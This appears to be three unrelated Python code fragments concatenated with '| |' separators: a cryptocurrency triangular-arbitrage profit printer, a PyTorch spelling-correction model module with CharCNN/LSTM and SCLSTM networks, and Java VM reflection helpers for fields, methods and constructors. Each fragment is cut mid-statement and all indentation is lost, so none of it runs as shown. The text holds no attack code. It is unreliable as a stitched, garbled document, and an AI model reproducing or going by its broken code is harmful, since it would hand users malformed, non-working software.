arb20_profitA = safe_division((currHOTEURBid - (currHOTBTCAsk*currBTCEURAsk))*100.0,currHOTBTCAsk*currBTCEURAsk)
if arb20_profitA >= min_profit:
print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy HOT " +str(currHOTBTCAsk) +" -> Sell HOT for " +str(currHOTEURBid) +"€ = " +str("%.3f" % arb20_profitA))
arb20_profitB = safe_division((currHOTBTCBid*currBTCEURBid - currHOTEURAsk)*100.0,currHOTEURAsk)
if arb20_profitB >= min_profit:
print(strftime("[%H:%M] ") +"Buy HOT " +str(currHOTEURAsk) +"€ -> Sell HOT " +str(currHOTBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb20_profitB))
#ICX
arb21_profitA = safe_division((currICXEURBid - (currICXBTCAsk*currBTCEURAsk))*100.0,currICXBTCAsk*currBTCEURAsk)
if arb21_profitA >= min_profit:
print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy ICX " +str(currICXBTCAsk) +" -> Sell ICX for " +str(currICXEURBid) +"€ = " +str("%.3f" % arb21_profitA))
arb21_profitB = safe_division((currICXBTCBid*currBTCEURBid - currICXEURAsk)*100.0,currICXEURAsk)
if arb21_profitB >= min_profit:
print(strftime("[%H:%M] ") +"Buy ICX " +str(currICXEURAsk) +"€ -> Sell ICX " +str(currICXBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb21_profitB))
#IOST
arb22_profitA = safe_division((currIOSTEURBid - (currIOSTBTCAsk*currBTCEURAsk))*100.0,currIOSTBTCAsk*currBTCEURAsk)
if arb22_profitA >= min_profit:
print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy IOST " +str(currIOSTBTCAsk) +" -> Sell IOST for " +str(currIOSTEURBid) +"€ = " +str("%.3f" % arb22_profitA))
arb22_profitB = safe_division((currIOSTBTCBid*currBTCEURBid - currIOSTEURAsk)*100.0,currIOSTEURAsk)
if arb22_profitB >= min_profit:
print(strftime("[%H:%M] ") +"Buy IOST " +str(currIOSTEURAsk) +"€ -> Sell IOST " +str(currIOSTBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb22_profitB))
#KMD
arb23_profitA = safe_division((currKMDEURBid - (currKMDBTCAsk*currBTCEURAsk))*100.0,currKMDBTCAsk*currBTCEURAsk)
if arb23_profitA >= min_profit:
print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy KMD " +str(currKMDBTCAsk) +" -> Sell KMD for " +str(currKMDEURBid) +"€ = " +str("%.3f" % arb23_profitA))
arb23_profitB = safe_division((currKMDBTCBid*currBTCEURBid - currKMDEURAsk)*100.0,currKMDEURAsk)
if arb23_profitB >= min_profit:
print(strftime("[%H:%M] ") +"Buy KMD " +str(currKMDEURAsk) +"€ -> Sell KMD " +str(currKMDBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb23_profitB))
#LINK
arb24_profitA = safe_division((currLINKEURBid - (currLINKBTCAsk*currBTCEURAsk))*100.0,currLINKBTCAsk*currBTCEURAsk)
if arb24_profitA >= min_profit:
print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy LINK " +str(currLINKBTCAsk) +" -> Sell LINK for " +str(currLINKEURBid) +"€ = " +str("%.3f" % arb24_profitA))
arb24_profitB = safe_division((currLINKBTCBid*currBTCEURBid - currLINKEURAsk)*100.0,currLINKEURAsk)
if arb24_profitB >= min_profit:
print(strftime("[%H:%M] ") +"Buy LINK " +str(currLINKEURAsk) +"€ -> Sell LINK " +str(currLINKBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb24_profitB))
#LRC
arb25_profitA = safe_division((currLRCEURBid - (currLRCBTCAsk*currBTCEURAsk))*100.0,currLRCBTCAsk*currBTCEURAsk)
if arb25_profitA >= min_profit:
print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy LRC " +str(currLRCBTCAsk) +" -> Sell LRC for " +str(currLRCEURBid) +"€ = " +str("%.3f" % arb25_profitA))
arb25_profitB = safe_division((currLRCBTCBid*currBTCEURBid - currLRCEURAsk)*100.0,currLRCEURAsk)
if arb25_profitB >= min_profit:
print(strftime("[%H:%M] ") +"Buy LRC " +str(currLRCEURAsk) +"€ -> Sell LRC " +str(currLRCBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb25_profitB))
#LSK
arb26_profitA = safe_division((currLSKEURBid - (currLSKBTCAsk*currBTCEURAsk))*100.0,currLSKBTCAsk*currBTCEURAsk)
if arb26_profitA >= min_profit:
print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy LSK " +str(currLSKBTCAsk) +" -> Sell LSK for " +str(currLSKEURBid) +"€ = " +str("%.3f" % arb26_profitA))
arb26_profitB = safe_division((currLSKBTCBid*currBTCEURBid - currLSKEURAsk)*100.0,currLSKEURAsk)
if arb26_profitB >= min_profit:
print(strftime("[%H:%M] ") +"Buy LSK " +str(currLSKEURAsk) +"€ -> Sell LSK " +str(currLSKBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb26_profitB))
#LTC
arb27_profitA = safe_division((currLTCEURBid - (currLTCBTCAsk*currBTCEURAsk))*100.0,currLTCBTCAsk*currBTCEURAsk)
if arb27_profitA >= min_profit:
print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy LTC " +str(currLTCBTCAsk) +" -> Sell LTC for " +str(currLTCEURBid) +"€ = " +str("%.3f" % arb27_profitA))
arb27_profitB = safe_division((currLTCBTCBid*currBTCEURBid - currLTCEURAsk)*100.0,currLTCEURAsk)
if arb27_profitB >= min_profit:
print(strftime("[%H:%M] ") +"Buy LTC " +str(currLTCEURAsk) +"€ -> Sell LTC " +str(currLTCBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb27_profitB))
#MIOTA
arb28_profitA = safe_division((currMIOTAEURBid - (currMIOTABTCAsk*currBTCEURAsk))*100.0,currMIOTABTCAsk*currBTCEURAsk)
if arb28_profitA >= min_profit:
print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy MIOTA " +str(currMIOTABTCAsk) +" -> Sell MIOTA for " +str(currMIOTAEURBid) +"€ = " +str("%.3f" % arb28_profitA))
arb28_profitB = safe_division((currMIOTABTCBid*currBTCEURBid - currMIOTAEURAsk)*100.0,currMIOTAEURAsk)
if arb28_profitB >= min_profit:
print(strftime("[%H:%M] ") +"Buy MIOTA " +str(currMIOTAEURAsk) +"€ -> Sell MIOTA " +str(currMIOTABTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb28_profitB))
#NANO
arb29_profitA = safe_division((currNANOEURBid - (currNANOBTCAsk*currBTCEURAsk))*100.0,currNANOBTCAsk*currBTCEURAsk)
if arb29_profitA >= min_profit:
print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy NANO " +str(currNANOBTCAsk) +" -> Sell NANO for " +str(currNANOEURBid) +"€ = " +str("%.3f" % arb29_profitA))
arb29_profitB = safe_division((currNANOBTCBid*currBTCEURBid - currNANOEURAsk)*100.0,currNANOEURAsk)
if arb29_profitB >= min_profit:
print(strftime("[%H:%M] ") +"Buy NANO " +str(currNANOEURAsk) +"€ -> Sell NANO " +str(currNANOBTCBid) +" -> Sell BTC for " +str(currBTCEURBid) +"€ = " +str("%.3f" % arb29_profitB))
#NAS
arb30_profitA = safe_division((currNASEURBid - (currNASBTCAsk*currBTCEURAsk))*100.0,currNASBTCAsk*currBTCEURAsk)
if arb30_profitA >= min_profit:
print(strftime("[%H:%M] ") +"Buy BTC " +str(currBTCEURAsk) +"€ -> Buy NAS " +str(currNASBTCAsk) +" -> Sell NAS for " +str(currNASEURBid) +"€ = " +str("%.3f" % arb30_profitA))
arb30_profitB = safe_division((currNASBTCBid*currBTCEURBid - currNASEURAsk)*100.0,currNASEURAsk)
if arb30_profitB >= min_profit:
print(strftime("[%H:%M] ") +"Buy NAS " +str(currNASEURAsk) +"€ -> Sell NAS " +str(currNASBTCBid) +" -> Sell | |
import os
import torch
import torch.nn.functional as F
import transformers
from torch import nn
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from torch.nn.utils.rnn import pad_sequence
from .util import is_module_available, get_module_or_attr
from ..commons import ALLENNLP_ELMO_PRETRAINED_FOLDER
DEFAULT_BERT_PRETRAINED_NAME_OR_PATH = "bert-base-cased"
def get_pretrained_bert(pretrained_name_or_path=None):
pretrained_name_or_path = pretrained_name_or_path or DEFAULT_BERT_PRETRAINED_NAME_OR_PATH
return transformers.AutoModel.from_pretrained(pretrained_name_or_path)
def get_pretrained_elmo(elmo_options_file=None, elmo_weights_file=None):
if not is_module_available("allennlp"):
raise ImportError(
"install `allennlp` by running `pip install -r extras-requirements.txt`. See `README.md` for more info.")
Elmo = get_module_or_attr("allennlp.modules.elmo", "Elmo")
local_options_file, local_weights_file = None, None
if os.path.exists(ALLENNLP_ELMO_PRETRAINED_FOLDER):
local_options_file = os.path.join(ALLENNLP_ELMO_PRETRAINED_FOLDER,
"elmo_2x4096_512_2048cnn_2xhighway_options.json")
local_weights_file = os.path.join(ALLENNLP_ELMO_PRETRAINED_FOLDER,
"elmo_2x4096_512_2048cnn_2xhighway_weights.hdf5")
options_file = "https://allennlp.s3.amazonaws.com/models/elmo/2x4096_512_2048cnn_2xhighway/elmo_2x4096_512_2048cnn_2xhighway_options.json"
weights_file = "https://allennlp.s3.amazonaws.com/models/elmo/2x4096_512_2048cnn_2xhighway/elmo_2x4096_512_2048cnn_2xhighway_weights.hdf5"
elmo_options_file = elmo_options_file or local_options_file or options_file # or os.environ.get('ELMO_OPTIONS_FILE_PATH', None)
elmo_weights_file = elmo_weights_file or local_weights_file or weights_file # or os.environ.get('ELMO_WEIGHTS_FILE_PATH', None)
# neuspell.seq_modeling.models.get_pretrained_elmo()
return Elmo(elmo_options_file, elmo_weights_file, 1) # 1 for setting device="cuda:0" else 0
#################################################
# CharCNNWordLSTMModel(CharCNNModel)
#################################################
class CharCNNModel(nn.Module):
def __init__(self, nembs, embdim, padding_idx, filterlens, nfilters):
super(CharCNNModel, self).__init__()
# Embeddings
self.embeddings = nn.Embedding(nembs, embdim, padding_idx=padding_idx)
# torch.nn.init.normal_(self.embeddings.weight.data, std=1.0)
self.embeddings.weight.requires_grad = True
# Unsqueeze [BS, MAXSEQ, EMDDIM] as [BS, 1, MAXSEQ, EMDDIM] and send as input
self.convmodule = nn.ModuleList()
for length, n in zip(filterlens, nfilters):
self.convmodule.append(
nn.Sequential(
nn.Conv2d(1, n, (length, embdim), padding=(length - 1, 0), dilation=1, bias=True,
padding_mode='zeros'),
nn.ReLU()
)
)
# each conv outputs [BS, nfilters, MAXSEQ, 1]
def forward(self, batch_tensor):
batch_size = len(batch_tensor)
# [BS, max_seq_len]->[BS, max_seq_len, emb_dim]
embs = self.embeddings(batch_tensor)
# [BS, max_seq_len, emb_dim]->[BS, 1, max_seq_len, emb_dim]
embs_unsqueezed = torch.unsqueeze(embs, dim=1)
# [BS, 1, max_seq_len, emb_dim]->[BS, out_channels, max_seq_len, 1]->[BS, out_channels, max_seq_len]
conv_outputs = [conv(embs_unsqueezed).squeeze(3) for conv in self.convmodule]
# [BS, out_channels, max_seq_len]->[BS, out_channels]
maxpool_conv_outputs = [F.max_pool1d(out, out.size(2)).squeeze(2) for out in conv_outputs]
# cat( [BS, out_channels] )->[BS, sum(nfilters)]
source_encodings = torch.cat(maxpool_conv_outputs, dim=1)
return source_encodings
class CharCNNWordLSTMModel(nn.Module):
def __init__(self, nchars, char_emb_dim, char_padding_idx, padding_idx, output_dim):
super(CharCNNWordLSTMModel, self).__init__()
# cnn module
# takes in a list[pad_sequence] with each pad_sequence of dim: [BS][nwords,max_nchars]
# runs a for loop to obtain list[tensor] with each tensor of dim: [BS][nwords,sum(nfilters)]
# then use rnn.pad_sequence(.) to obtain the dim: [BS, max_nwords, sum(nfilters)]
nfilters, filtersizes = [50, 100, 100, 100], [2, 3, 4, 5]
self.cnnmodule = CharCNNModel(nchars, char_emb_dim, char_padding_idx, filtersizes, nfilters)
self.cnnmodule_outdim = sum(nfilters)
# lstm module
# expected input dim: [BS,max_nwords,*] and batch_lengths as [BS] for pack_padded_sequence
bidirectional, hidden_size, nlayers = True, 512, 2
self.lstmmodule = nn.LSTM(self.cnnmodule_outdim, hidden_size, nlayers,
batch_first=True, dropout=0.3, bidirectional=bidirectional)
self.lstmmodule_outdim = hidden_size * 2 if bidirectional else hidden_size
# output module
assert output_dim > 0
self.dropout = nn.Dropout(p=0.4)
self.dense = nn.Linear(self.lstmmodule_outdim, output_dim)
# loss
# See https://pytorch.org/docs/stable/nn.html#crossentropyloss
self.criterion = nn.CrossEntropyLoss(reduction='mean', ignore_index=padding_idx)
def forward(self,
batch_idxs: "list[pad_sequence]",
batch_lengths: "tensor",
aux_word_embs: "tensor" = None,
targets: "tensor" = None,
topk=1):
batch_size = len(batch_idxs)
# cnn
cnn_encodings = [self.cnnmodule(pad_sequence_) for pad_sequence_ in batch_idxs]
cnn_encodings = pad_sequence(cnn_encodings, batch_first=True, padding_value=0)
# concat aux_embs
# if not None, the expected dim for aux_word_embs: [BS,max_nwords,*]
intermediate_encodings = cnn_encodings
if aux_word_embs is not None:
intermediate_encodings = torch.cat((intermediate_encodings, aux_word_embs), dim=2)
# lstm
# dim: [BS,max_nwords,*]->[BS,max_nwords,self.lstmmodule_outdim]
intermediate_encodings = pack_padded_sequence(intermediate_encodings, batch_lengths,
batch_first=True, enforce_sorted=False)
lstm_encodings, (last_hidden_states, last_cell_states) = self.lstmmodule(intermediate_encodings)
lstm_encodings, _ = pad_packed_sequence(lstm_encodings, batch_first=True, padding_value=0)
# dense
# [BS,max_nwords,self.lstmmodule_outdim]->[BS,max_nwords,output_dim]
logits = self.dense(self.dropout(lstm_encodings))
# loss
if targets is not None:
assert len(targets) == batch_size # targets:[[BS,max_nwords]
logits_permuted = logits.permute(0, 2, 1) # logits: [BS,output_dim,max_nwords]
loss = self.criterion(logits_permuted, targets)
# eval preds
if not self.training:
probs = F.softmax(logits, dim=-1) # [BS,max_nwords,output_dim]
if topk > 1:
topk_values, topk_inds = \
torch.topk(probs, topk, dim=-1, largest=True,
sorted=True) # -> (Tensor, LongTensor) of [BS,max_nwords,topk]
elif topk == 1:
topk_inds = torch.argmax(probs, dim=-1) # [BS,max_nwords]
# Note that for those positions with padded_idx,
# the arg_max_prob above computes a index because
# the bias term leads to non-uniform values in those positions
return loss.cpu().detach().numpy(), topk_inds.cpu().detach().numpy()
return loss
#################################################
# CharLSTMWordLSTMModel(CharLSTMModel)
#################################################
class CharLSTMModel(nn.Module):
def __init__(self, nembs, embdim, padding_idx, hidden_size, num_layers, bidirectional, output_combination):
super(CharLSTMModel, self).__init__()
# Embeddings
self.embeddings = nn.Embedding(nembs, embdim, padding_idx=padding_idx)
# torch.nn.init.normal_(self.embeddings.weight.data, std=1.0)
self.embeddings.weight.requires_grad = True
# lstm module
# expected input dim: [BS,max_nwords,*] and batch_lengths as [BS] for pack_padded_sequence
self.lstmmodule = nn.LSTM(embdim, hidden_size, num_layers, batch_first=True, dropout=0.3,
bidirectional=bidirectional)
self.lstmmodule_outdim = hidden_size * 2 if bidirectional else hidden_size
# output
assert output_combination in ["end", "max", "mean"], print(
'invalid output_combination; required one of {"end","max","mean"}')
self.output_combination = output_combination
def forward(self, batch_tensor, batch_lengths):
batch_size = len(batch_tensor)
# print("************ stage 2")
# [BS, max_seq_len]->[BS, max_seq_len, emb_dim]
embs = self.embeddings(batch_tensor)
# lstm
# dim: [BS,max_nwords,*]->[BS,max_nwords,self.lstmmodule_outdim]
embs_packed = pack_padded_sequence(embs, batch_lengths, batch_first=True, enforce_sorted=False)
lstm_encodings, (last_hidden_states, last_cell_states) = self.lstmmodule(embs_packed)
lstm_encodings, _ = pad_packed_sequence(lstm_encodings, batch_first=True, padding_value=0)
# [BS, max_seq_len, self.lstmmodule_outdim]->[BS, self.lstmmodule_outdim]
if self.output_combination == "end":
last_seq_idxs = torch.LongTensor([x - 1 for x in batch_lengths])
source_encodings = lstm_encodings[range(lstm_encodings.shape[0]), last_seq_idxs, :]
elif self.output_combination == "max":
source_encodings, _ = torch.max(lstm_encodings, dim=1)
elif self.output_combination == "mean":
sum_ = torch.sum(lstm_encodings, dim=1)
lens_ = batch_lengths.unsqueeze(dim=1).expand(batch_size, self.lstmmodule_outdim)
assert sum_.size() == lens_.size()
source_encodings = torch.div(sum_, lens_)
else:
raise NotImplementedError
return source_encodings
class CharLSTMWordLSTMModel(nn.Module):
def __init__(self, nchars, char_emb_dim, char_padding_idx, padding_idx, output_dim):
super(CharLSTMWordLSTMModel, self).__init__()
# charlstm module
# takes in a list[pad_sequence] with each pad_sequence of dim: [BS][nwords,max_nchars]
# runs a for loop to obtain list[tensor] with each tensor of dim: [BS][nwords,charlstm_outputdim]
# then use rnn.pad_sequence(.) to obtain the dim: [BS, max_nwords, charlstm_outputdim]
hidden_size, num_layers, bidirectional, output_combination = 256, 1, True, "end"
self.charlstmmodule = CharLSTMModel(nchars, char_emb_dim, char_padding_idx, hidden_size, num_layers,
bidirectional, output_combination)
self.charlstmmodule_outdim = self.charlstmmodule.lstmmodule_outdim
# lstm module
# expected input dim: [BS,max_nwords,*] and batch_lengths as [BS] for pack_padded_sequence
bidirectional, hidden_size, nlayers = True, 512, 2
self.lstmmodule = nn.LSTM(self.charlstmmodule_outdim, hidden_size, nlayers,
batch_first=True, dropout=0.3, bidirectional=bidirectional)
self.lstmmodule_outdim = hidden_size * 2 if bidirectional else hidden_size
# output module
assert output_dim > 0
self.dropout = nn.Dropout(p=0.4)
self.dense = nn.Linear(self.lstmmodule_outdim, output_dim)
# loss
# See https://pytorch.org/docs/stable/nn.html#crossentropyloss
self.criterion = nn.CrossEntropyLoss(reduction='mean', ignore_index=padding_idx)
def forward(self,
batch_idxs: "list[pad_sequence]",
batch_char_lengths: "list[tensor]",
batch_lengths: "tensor",
aux_word_embs: "tensor" = None,
targets: "tensor" = None,
topk=1):
batch_size = len(batch_idxs)
# print("************ stage 1")
# charlstm
charlstm_encodings = [self.charlstmmodule(pad_sequence_, lens) for pad_sequence_, lens in
zip(batch_idxs, batch_char_lengths)]
charlstm_encodings = pad_sequence(charlstm_encodings, batch_first=True, padding_value=0)
# concat aux_embs
# if not None, the expected dim for aux_word_embs: [BS,max_nwords,*]
intermediate_encodings = charlstm_encodings
if aux_word_embs is not None:
intermediate_encodings = torch.cat((intermediate_encodings, aux_word_embs), dim=2)
# lstm
# dim: [BS,max_nwords,*]->[BS,max_nwords,self.lstmmodule_outdim]
intermediate_encodings = pack_padded_sequence(intermediate_encodings, batch_lengths,
batch_first=True, enforce_sorted=False)
lstm_encodings, (last_hidden_states, last_cell_states) = self.lstmmodule(intermediate_encodings)
lstm_encodings, _ = pad_packed_sequence(lstm_encodings, batch_first=True, padding_value=0)
# dense
# [BS,max_nwords,self.lstmmodule_outdim]->[BS,max_nwords,output_dim]
logits = self.dense(self.dropout(lstm_encodings))
# loss
if targets is not None:
assert len(targets) == batch_size # targets:[[BS,max_nwords]
logits_permuted = logits.permute(0, 2, 1) # logits: [BS,output_dim,max_nwords]
loss = self.criterion(logits_permuted, targets)
# eval preds
if not self.training:
probs = F.softmax(logits, dim=-1) # [BS,max_nwords,output_dim]
if topk > 1:
topk_values, topk_inds = \
torch.topk(probs, topk, dim=-1, largest=True,
sorted=True) # -> (Tensor, LongTensor) of [BS,max_nwords,topk]
elif topk == 1:
topk_inds = torch.argmax(probs, dim=-1) # [BS,max_nwords]
# Note that for those positions with padded_idx,
# the arg_max_prob above computes a index because
# the bias term leads to non-uniform values in those positions
return loss.cpu().detach().numpy(), topk_inds.cpu().detach().numpy()
return loss
#################################################
# SCLSTM
#################################################
class SCLSTM(nn.Module):
def __init__(self, screp_dim, padding_idx, output_dim):
super(SCLSTM, self).__init__()
# lstm module
# expected input dim: [BS,max_nwords,*] and batch_lengths as [BS] for pack_padded_sequence
bidirectional, hidden_size, nlayers = True, 512, 2
self.lstmmodule = nn.LSTM(screp_dim, hidden_size, nlayers,
batch_first=True, dropout=0.4, bidirectional=bidirectional) # 0.3 or 0.4
self.lstmmodule_outdim = hidden_size * 2 if bidirectional else hidden_size
# output module
assert output_dim > 0
self.dropout = nn.Dropout(p=0.5) # 0.4 or 0.5
self.dense = nn.Linear(self.lstmmodule_outdim, output_dim)
# loss
# See https://pytorch.org/docs/stable/nn.html#crossentropyloss
self.criterion = nn.CrossEntropyLoss(reduction='mean', ignore_index=padding_idx)
def forward(self,
batch_screps: "list[pad_sequence]",
batch_lengths: "tensor",
aux_word_embs: "tensor" = None,
targets: "tensor" = None,
topk=1):
# cnn
batch_size = len(batch_screps)
batch_screps = pad_sequence(batch_screps, batch_first=True, padding_value=0)
# concat aux_embs
# if not None, the expected dim for aux_word_embs: [BS,max_nwords,*]
intermediate_encodings = batch_screps
if aux_word_embs is not None:
intermediate_encodings = torch.cat((intermediate_encodings, aux_word_embs), dim=2)
# lstm
# dim: [BS,max_nwords,*]->[BS,max_nwords,self.lstmmodule_outdim]
intermediate_encodings = pack_padded_sequence(intermediate_encodings, batch_lengths,
batch_first=True, enforce_sorted=False)
lstm_encodings, (last_hidden_states, last_cell_states) = self.lstmmodule(intermediate_encodings)
lstm_encodings, _ = pad_packed_sequence(lstm_encodings, batch_first=True, padding_value=0)
# dense
# [BS,max_nwords,self.lstmmodule_outdim]->[BS,max_nwords,output_dim]
logits = self.dense(self.dropout(lstm_encodings))
# loss
if targets is not None:
assert len(targets) == batch_size # targets:[[BS,max_nwords]
logits_permuted = logits.permute(0, 2, 1) # logits: [BS,output_dim,max_nwords]
loss = self.criterion(logits_permuted, targets)
# eval preds
if not self.training:
probs = F.softmax(logits, dim=-1) # [BS,max_nwords,output_dim]
if topk > 1:
topk_values, topk_inds = \
torch.topk(probs, topk, dim=-1, largest=True,
sorted=True) # -> (Tensor, LongTensor) | |
cls, method):
return vmfield_get_helper(locals, "ref")
def VMField_getType(locals, loader, cls, method):
this = locals.get(0, "ref")
clazz = this.fields.get('clazz', "ref")
name = unpack_string(this.fields.get('name', "ref"))
const = clazz.class_type.cls.constant_pool
for i in range(clazz.class_type.cls.fields_count):
f = clazz.class_type.cls.fields[i]
fname = const[f.name_index]
descr = const[f.descriptor_index]
if fname==name:
break
if descr.startswith("L"):
cls_name = descr[1:-1]
return vmobject_getClass_helper(loader.getclass(cls_name), loader)
else:
prim_cls = get_primitive_class_helper(descr, loader)
return prim_cls
def VMField_getModifiersInternal(locals, loader, cls, method):
this = locals.get(0, "ref")
clazz = this.fields.get('clazz', "ref")
name = unpack_string(this.fields.get('name', "ref"))
const = clazz.class_type.cls.constant_pool
for i in range(clazz.class_type.cls.fields_count):
f = clazz.class_type.cls.fields[i]
fname = const[f.name_index]
flags = f.access_flags
if fname==name:
break
return flags
def VMMethod_getParameterTypes(locals, loader, cls, method):
this = locals.get(0, "ref")
descriptor = this.fields.get('descriptor', "ref")
lst = []
parseing_ref = False
ref_name = ""
array_dim = 0
# TODO: write only one parse method
for char in descriptor:
# End of args
if char==")":
break
#parse array-class
if char=="[":
array_dim = array_dim +1
#parse references:
if char==";":
parseing_ref = False
if not array_dim == 0:
jcls = loader.getclass("["*array_dim + ref_name)
array_dim = 0
else:
jcls = loader.getclass(ref_name)
ref_name= ""
cls = vmobject_getClass_helper(jcls, loader)
lst.append(cls)
if parseing_ref:
ref_name += char
continue
if char=='L':
parseing_ref = True
if char=='B'or char == 'C' or char == 'D' or char == 'F' or char == 'I' or char == 'J' or char == 'S' or char == 'Z' or char == 'V':
if not array_dim == 0:
jcls = loader.getclass("["*array_dim + char)
array_dim = 0
cls = vmobject_getClass_helper(jcls, loader)
else:
cls = get_primitive_class_helper(char , loader)
lst.append(cls)
cls_array = Arrayref(lst,None, loader.getclass("[Ljava.lang.Class;"))
return cls_array
def VMMethod_getExceptionTypes(locals, loader, cls, method):
this = locals.get(0, "ref")
exc_lst = this.fields.get('exceptions', "ref")
lst = []
for ref_name in exc_lst:
jcls = loader.getclass(ref_name)
cls = vmobject_getClass_helper(jcls, loader)
lst.append(cls)
cls_array = Arrayref(lst,None, loader.getclass("[Ljava.lang.Class;"))
return cls_array
# TODO: throws IllegalAccessException, InvocationTargetException
def VMMethod_invoke(locals, loader, cls, method):
this = locals.get(0, "ref")
method = this.fields.get('method_info', "ref")
objref = locals.get(1, "ref")
objref_args_array = locals.get(2, "ref")
args = unwrapp_args_helper(objref_args_array)
const = objref.jcls.cls.constant_pool
descr = descriptor(const[method.descriptor_index])
args.push(objref)
result = loader.invoke_method(objref.jcls.cls, method, descr, args)
return wrapp_result(result, descr, loader)
def wrapp_result(value, descr, loader):
if descr[-1]=="byte":
jcls = loader.getclass("java/lang/Byte")
objref = Objectref(jcls, True)
objref.fields.set('value', value, "int")
return objref
elif descr[-1]=="short":
jcls = loader.getclass("java/lang/Short")
objref = Objectref(jcls, True)
objref.fields.set('value', value, "int")
return objref
elif descr[-1]=="int":
jcls = loader.getclass("java/lang/Integer")
objref = Objectref(jcls, True)
objref.fields.set('value', value, "int")
return objref
elif descr[-1]=="boolean":
jcls = loader.getclass("java/lang/Boolean")
objref = Objectref(jcls, True)
objref.fields.set('value', value, "int")
return objref
elif descr[-1]=="char":
jcls = loader.getclass("java/lang/Character")
objref = Objectref(jcls, True)
objref.fields.set('value', value, "char")
return objref
elif descr[-1]=="long":
jcls = loader.getclass("java/lang/Long")
objref = Objectref(jcls, True)
objref.fields.set('value', value, "long")
return objref
elif descr[-1]=="float":
jcls = loader.getclass("java/lang/Float")
objref = Objectref(jcls, True)
objref.fields.set('value', value, "float")
return objref
elif descr[-1]=="double":
jcls = loader.getclass("java/lang/Double")
objref = Objectref(jcls, True)
objref.fields.set('value', value, "double")
return objref
return value
def unwrapp_args_helper(array):
stack = Stack()
lst = array.arrayref
lst.reverse()
for elem in lst:
#XXX more...
if elem.jcls.__name__ == "java/lang/Short" or elem.jcls.__name__ == "java/lang/Byte" or elem.jcls.__name__ == "java/lang/Integer" or elem.jcls.__name__ == "java/lang/Boolean":
value = elem.fields.get('value', "int")
stack.push(value)
elif elem.jcls.__name__ == "java/lang/Character":
value = elem.fields.get('value', "char")
stack.push(value)
elif elem.jcls.__name__ == "java/lang/Long":
value = elem.fields.get('value', "long")
stack.push(value)
elif elem.jcls.__name__ == "java/lang/Float":
value = elem.fields.get('value', "float")
stack.push(value)
elif elem.jcls.__name__ == "java/lang/Double":
value = elem.fields.get('value', "double")
stack.push(value)
else:
stack.push(elem)
return stack
def VMMethod_getReturnType(locals, loader, cls, method):
this = locals.get(0, "ref")
descriptor = this.fields.get('descriptor', "ref")
i = 0
for c in descriptor:
if descriptor[i] != ')':
i = i+1
continue
char = descriptor[i+1:]
if char=='B'or char == 'C' or char == 'D' or char == 'F' or char == 'I' or char == 'J' or char == 'S' or char == 'Z' or char == 'V':
cls = get_primitive_class_helper(char , loader)
else:
ref_name = char[1:-1]
jcls = loader.getclass(ref_name)
cls = vmobject_getClass_helper(jcls, loader)
return cls
def VMMethod_getModifiersInternal(locals, loader, cls, method):
this = locals.get(0, "ref")
method_info = this.fields.get('method_info', "ref")
return method_info.access_flags
def VMConstructor_getParameterTypes(locals, loader, cls, method):
this = locals.get(0, "ref")
method_info = this.fields.get('method_info', "ref")
clazz = this.fields.get('clazz', "ref")
const = clazz.class_type.cls.constant_pool
descriptor = const[method_info.descriptor_index]
lst = []
parseing_ref = False
ref_name = ""
array_dim = 0
# TODO: write only one parse method
for char in descriptor:
# End of args
if char==")":
break
#parse array-class
if char=="[":
array_dim = array_dim +1
#parse references:
if char==";":
parseing_ref = False
if not array_dim == 0:
jcls = loader.getclass("["*array_dim + ref_name)
array_dim = 0
else:
jcls = loader.getclass(ref_name)
ref_name= ""
cls = vmobject_getClass_helper(jcls, loader)
lst.append(cls)
if parseing_ref:
ref_name += char
continue
if char=='L':
parseing_ref = True
if char=='B'or char == 'C' or char == 'D' or char == 'F' or char == 'I' or char == 'J' or char == 'S' or char == 'Z' or char == 'V':
if not array_dim == 0:
jcls = loader.getclass("["*array_dim + char)
array_dim = 0
cls = vmobject_getClass_helper(jcls, loader)
else:
cls = get_primitive_class_helper(char , loader)
lst.append(cls)
cls_array = Arrayref(lst,None, loader.getclass("[Ljava.lang.Class;"))
return cls_array
def VMConstructor_getExceptionTypes(locals, loader, cls, method):
this = locals.get(0, "ref")
excp_lst = this.fields.get('exceptions', "ref")
lst = []
for e in excp_lst:
jcls = loader.getclass(e)
cls = vmobject_getClass_helper(jcls, loader)
lst.append(cls)
cls_array = Arrayref(lst,None, loader.getclass("[Ljava.lang.Class;"))
return cls_array
def VMConstructor_getModifiersInternal(locals, loader, cls, method):
this = locals.get(0, "ref")
method_info = this.fields.get(u'method_info', "ref")
return method_info.access_flags
def VMConstructor_construct(locals, loader, cls, method):
this = locals.get(0, "ref")
objref_args_array = locals.get(1, "ref")
clazz = this.fields.get('clazz', "ref")
method_info = this.fields.get(u'method_info', "ref")
objref = Objectref(clazz.class_type, True) # new this
# TODO: call constructor
args = unwrapp_args_helper(objref_args_array)
const = clazz.class_type.cls.constant_pool
descr = descriptor(const[method_info.descriptor_index])
args.push(objref)
#try:
loader.invoke_method(objref.jcls.cls, method_info, descr, args)
